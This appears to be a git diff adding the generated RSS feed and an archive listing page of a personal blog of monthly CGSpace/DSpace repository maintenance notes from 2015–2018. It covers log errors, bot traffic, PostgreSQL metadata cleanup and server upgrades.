ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. 
+</code></pre><ul> +<li>And there are many of these errors every day for the past month:</li> +</ul> +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* +dspace.log.2017-11-21:4 +dspace.log.2017-11-22:1 +dspace.log.2017-11-23:4 +dspace.log.2017-11-24:11 +dspace.log.2017-11-25:0 +dspace.log.2017-11-26:1 +dspace.log.2017-11-27:7 +dspace.log.2017-11-28:21 +dspace.log.2017-11-29:31 +dspace.log.2017-11-30:15 +dspace.log.2017-12-01:15 +dspace.log.2017-12-02:20 +dspace.log.2017-12-03:38 +dspace.log.2017-12-04:65 +dspace.log.2017-12-05:43 +dspace.log.2017-12-06:72 +dspace.log.2017-12-07:27 +dspace.log.2017-12-08:15 +dspace.log.2017-12-09:29 +dspace.log.2017-12-10:35 +dspace.log.2017-12-11:20 +dspace.log.2017-12-12:44 +dspace.log.2017-12-13:36 +dspace.log.2017-12-14:59 +dspace.log.2017-12-15:104 +dspace.log.2017-12-16:53 +dspace.log.2017-12-17:66 +dspace.log.2017-12-18:83 +dspace.log.2017-12-19:101 +dspace.log.2017-12-20:74 +dspace.log.2017-12-21:55 +dspace.log.2017-12-22:66 +dspace.log.2017-12-23:50 +dspace.log.2017-12-24:85 +dspace.log.2017-12-25:62 +dspace.log.2017-12-26:49 +dspace.log.2017-12-27:30 +dspace.log.2017-12-28:54 +dspace.log.2017-12-29:68 +dspace.log.2017-12-30:89 +dspace.log.2017-12-31:53 +dspace.log.2018-01-01:45 +dspace.log.2018-01-02:34 +</code></pre><ul> +<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li> +</ul> + + + + December, 2017 + https://alanorth.github.io/cgspace-notes/2017-12/ + Fri, 01 Dec 2017 13:53:54 +0300 + + https://alanorth.github.io/cgspace-notes/2017-12/ + <h2 id="2017-12-01">2017-12-01</h2> +<ul> +<li>Uptime Robot noticed that CGSpace went down</li> +<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li> +<li>PostgreSQL activity says there are 115 connections currently</li> +<li>The list of connections to XMLUI and REST API for today:</li> +</ul> + + + + November, 2017 + https://alanorth.github.io/cgspace-notes/2017-11/ + Thu, 02 Nov 2017 09:37:54 +0200 + + https://alanorth.github.io/cgspace-notes/2017-11/ + <h2 id="2017-11-01">2017-11-01</h2> +<ul> +<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li> +</ul> +<h2 id="2017-11-02">2017-11-02</h2> +<ul> +<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> +</ul> +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log +0 +</code></pre><ul> +<li>Generate list of authors on CGSpace for Peter to go through and correct:</li> +</ul> +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; +COPY 54701 +</code></pre> + + + + October, 2017 + https://alanorth.github.io/cgspace-notes/2017-10/ + Sun, 01 Oct 2017 08:07:54 +0300 + + https://alanorth.github.io/cgspace-notes/2017-10/ + <h2 id="2017-10-01">2017-10-01</h2> +<ul> +<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li> +</ul> +<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336 +</code></pre><ul> +<li>There appears to be a pattern 
but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li> +<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li> +</ul> + + + + CGIAR Library Migration + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + Mon, 18 Sep 2017 16:38:35 +0300 + + https://alanorth.github.io/cgspace-notes/cgiar-library-migration/ + <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p> + + + + September, 2017 + https://alanorth.github.io/cgspace-notes/2017-09/ + Thu, 07 Sep 2017 16:54:52 +0700 + + https://alanorth.github.io/cgspace-notes/2017-09/ + <h2 id="2017-09-06">2017-09-06</h2> +<ul> +<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li> +</ul> +<h2 id="2017-09-07">2017-09-07</h2> +<ul> +<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li> +</ul> + + + + August, 2017 + https://alanorth.github.io/cgspace-notes/2017-08/ + Tue, 01 Aug 2017 11:51:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-08/ + <h2 id="2017-08-01">2017-08-01</h2> +<ul> +<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li> +<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li> +<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li> +<li>This means our Tomcat Crawler Session Valve is working</li> +<li>But many of the bots are browsing dynamic URLs like: +<ul> +<li>/handle/10568/3353/discover</li> +<li>/handle/10568/16510/browse</li> +</ul> +</li> +<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li> +<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li> +<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li> +<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li> +<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li> +<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li> +<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li> +<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li> +<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li> +</ul> + + + + July, 2017 + https://alanorth.github.io/cgspace-notes/2017-07/ + Sat, 01 Jul 2017 18:03:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-07/ + <h2 id="2017-07-01">2017-07-01</h2> +<ul> +<li>Run system updates and reboot 
DSpace Test</li> +</ul> +<h2 id="2017-07-04">2017-07-04</h2> +<ul> +<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li> +<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li> +<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li> +</ul> + + + + June, 2017 + https://alanorth.github.io/cgspace-notes/2017-06/ + Thu, 01 Jun 2017 10:14:52 +0300 + + https://alanorth.github.io/cgspace-notes/2017-06/ + 2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg. + + + + May, 2017 + https://alanorth.github.io/cgspace-notes/2017-05/ + Mon, 01 May 2017 16:21:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-05/ + 2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace. 
+ + + + April, 2017 + https://alanorth.github.io/cgspace-notes/2017-04/ + Sun, 02 Apr 2017 17:08:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-04/ + <h2 id="2017-04-02">2017-04-02</h2> +<ul> +<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li> +<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p> +<ul> +<li>Remove redundant/duplicate text in the DSpace submission license</li> +<li>Testing the CMYK patch on a collection with 650 items:</li> +</ul> +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt +</code></pre> + + + + March, 2017 + https://alanorth.github.io/cgspace-notes/2017-03/ + Wed, 01 Mar 2017 17:08:52 +0200 + + https://alanorth.github.io/cgspace-notes/2017-03/ + <h2 id="2017-03-01">2017-03-01</h2> +<ul> +<li>Run the 279 CIAT author corrections on CGSpace</li> +</ul> +<h2 id="2017-03-02">2017-03-02</h2> +<ul> +<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li> +<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li> +<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li> +<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li> +<li>Need to send Peter and Michael some notes about this in a few days</li> +<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li> +<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li> +<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li> +<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li> +</ul> +<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg +/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000 +</code></pre> + + + + February, 2017 + https://alanorth.github.io/cgspace-notes/2017-02/ + Tue, 07 Feb 2017 07:04:52 -0800 + + https://alanorth.github.io/cgspace-notes/2017-02/ + <h2 id="2017-02-07">2017-02-07</h2> +<ul> +<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> +</ul> +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; + id | collection_id | item_id +-------+---------------+--------- + 92551 | 313 | 80278 + 92550 | 313 | 80278 + 90774 | 1051 | 80278 +(3 rows) +dspace=# delete from collection2item where id = 92551 and item_id = 80278; +DELETE 1 +</code></pre><ul> +<li>Create issue 
on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li> +<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li> +</ul> + + + + January, 2017 + https://alanorth.github.io/cgspace-notes/2017-01/ + Mon, 02 Jan 2017 10:43:00 +0300 + + https://alanorth.github.io/cgspace-notes/2017-01/ + <h2 id="2017-01-02">2017-01-02</h2> +<ul> +<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li> +<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li> +<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li> +</ul> + + + + December, 2016 + https://alanorth.github.io/cgspace-notes/2016-12/ + Fri, 02 Dec 2016 10:43:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-12/ + <h2 id="2016-12-02">2016-12-02</h2> +<ul> +<li>CGSpace was down for five hours in the morning while I was sleeping</li> +<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> +</ul> +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +</code></pre><ul> +<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> +<li>I&rsquo;ve 
raised a ticket with Atmire to ask</li> +<li>Another worrying error from dspace.log is:</li> +</ul> + + + + November, 2016 + https://alanorth.github.io/cgspace-notes/2016-11/ + Tue, 01 Nov 2016 09:21:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-11/ + <h2 id="2016-11-01">2016-11-01</h2> +<ul> +<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p> + + + + October, 2016 + https://alanorth.github.io/cgspace-notes/2016-10/ + Mon, 03 Oct 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-10/ + <h2 id="2016-10-03">2016-10-03</h2> +<ul> +<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li> +<li>Need to test the following scenarios to see how author order is affected: +<ul> +<li>ORCIDs only</li> +<li>ORCIDs plus normal authors</li> +</ul> +</li> +<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li> +</ul> +<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X +</code></pre> + + + + September, 2016 + https://alanorth.github.io/cgspace-notes/2016-09/ + Thu, 01 Sep 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-09/ + <h2 id="2016-09-01">2016-09-01</h2> +<ul> +<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li> +<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li> +<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> +<li>It looks like we might be able to use OUs now, instead of DCs:</li> +</ul> +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; +</code></pre> + + + + August, 2016 + https://alanorth.github.io/cgspace-notes/2016-08/ + Mon, 01 Aug 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-08/ + <h2 id="2016-08-01">2016-08-01</h2> +<ul> +<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li> +<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions of out date</li> +<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li> +<li>bower stuff is a dead end, waste of time, too many issues</li> +<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li> +<li>Start working on DSpace 5.1 → 5.5 port:</li> +</ul> +<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod +$ git reset --hard ilri/5_x-prod +$ git rebase -i dspace-5.5 +</code></pre> + + + + July, 2016 + https://alanorth.github.io/cgspace-notes/2016-07/ + Fri, 01 Jul 2016 10:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-07/ + <h2 
id="2016-07-01">2016-07-01</h2> +<ul> +<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> +<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> +</ul> +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; +UPDATE 95 +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; + text_value +------------ +(0 rows) +</code></pre><ul> +<li>In this case the select query was showing 95 results before the update</li> +</ul> + + + + June, 2016 + https://alanorth.github.io/cgspace-notes/2016-06/ + Wed, 01 Jun 2016 10:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-06/ + <h2 id="2016-06-01">2016-06-01</h2> +<ul> +<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li> +<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li> +<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li> +<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li> +<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li> +<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li> +</ul> + + + + May, 2016 + https://alanorth.github.io/cgspace-notes/2016-05/ + Sun, 01 May 2016 23:06:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-05/ + <h2 id="2016-05-01">2016-05-01</h2> +<ul> +<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li> +<li>I have blocked access to the API now</li> +<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> +</ul> +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l +3168 +</code></pre> + + + + April, 2016 + https://alanorth.github.io/cgspace-notes/2016-04/ + Mon, 04 Apr 2016 11:06:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-04/ + <h2 id="2016-04-04">2016-04-04</h2> +<ul> +<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li> +<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li> +<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li> +<li>This will save us a few gigs 
of backup space we&rsquo;re paying for on S3</li> +<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li> +</ul> + + + + March, 2016 + https://alanorth.github.io/cgspace-notes/2016-03/ + Wed, 02 Mar 2016 16:50:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-03/ + <h2 id="2016-03-02">2016-03-02</h2> +<ul> +<li>Looking at issues with author authorities on CGSpace</li> +<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li> +<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li> +</ul> + + + + February, 2016 + https://alanorth.github.io/cgspace-notes/2016-02/ + Fri, 05 Feb 2016 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-02/ + <h2 id="2016-02-05">2016-02-05</h2> +<ul> +<li>Looking at some DAGRIS data for Abenet Yabowork</li> +<li>Lots of issues with spaces, newlines, etc causing the import to fail</li> +<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p> +<ul> +<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li> +<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li> +</ul> + + + + January, 2016 + https://alanorth.github.io/cgspace-notes/2016-01/ + Wed, 13 Jan 2016 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-01/ + <h2 id="2016-01-13">2016-01-13</h2> +<ul> +<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li> +<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li> +<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li> +</ul> + + + + December, 2015 + https://alanorth.github.io/cgspace-notes/2015-12/ + Wed, 02 Dec 2015 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2015-12/ + <h2 id="2015-12-02">2015-12-02</h2> +<ul> +<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li> +</ul> +<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log +# ls -lh dspace.log.2015-11-18* +-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18 +-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo +-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz +</code></pre> + + + + November, 2015 + https://alanorth.github.io/cgspace-notes/2015-11/ + Mon, 23 Nov 2015 17:00:57 +0300 + + https://alanorth.github.io/cgspace-notes/2015-11/ + <h2 id="2015-11-22">2015-11-22</h2> +<ul> +<li>CGSpace went down</li> +<li>Looks like DSpace exhausted its PostgreSQL connection pool</li> +<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> +</ul> +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c 
cgspace +78 +</code></pre> + + + + diff --git a/docs/posts/page/1/index.html b/docs/posts/page/1/index.html new file mode 100644 index 000000000..8da731956 --- /dev/null +++ b/docs/posts/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/posts/ + + + + + + diff --git a/docs/posts/page/10/index.html b/docs/posts/page/10/index.html new file mode 100644 index 000000000..bbaf5fcc7 --- /dev/null +++ b/docs/posts/page/10/index.html @@ -0,0 +1,325 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

April, 2016

+ +
+

2016-04-04

+
    +
  • Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit
  • +
  • We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc
  • +
  • After running DSpace for over five years I’ve never needed to look in any other log file than dspace.log, let alone one from last year!
  • +
  • This will save us a few gigs of backup space we’re paying for on S3
  • +
  • Also, I noticed the checker log has some errors we should pay attention to:
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2016

+ +
+

2016-03-02

+
    +
  • Looking at issues with author authorities on CGSpace
  • +
  • For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
  • +
  • Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match the environment on the CGSpace server
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2016

+ +
+

2016-02-05

+
    +
  • Looking at some DAGRIS data for Abenet Yabowork
  • +
  • Lots of issues with spaces, newlines, etc causing the import to fail
  • +
  • I noticed we have a very interesting list of countries on CGSpace:
  • +
+

CGSpace country list

+
    +
  • Not only are there 49,000 countries, we have some blanks (25)…
  • +
  • Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2016

+ +
+

2016-01-13

+
    +
  • Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_collections.sh script I wrote last year.
  • +
  • I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
  • +
  • Update GitHub wiki for documentation of maintenance tasks.
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2015

+ +
+

2015-12-02

+
    +
  • Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less space:
  • +
+
# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+
+ Read more → +
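The corresponding cron job would be something along these lines (a sketch only; the filename pattern and retention window are made up):
# find /home/dspacetest.cgiar.org/log -name 'dspace.log.*' ! -name '*.xz' ! -name '*.lzo' -mtime +7 -exec xz {} \;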
+ + + + + + +
+
+

November, 2015

+ +
+

2015-11-22

+
    +
  • CGSpace went down
  • +
  • Looks like DSpace exhausted its PostgreSQL connection pool
  • +
  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+78
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
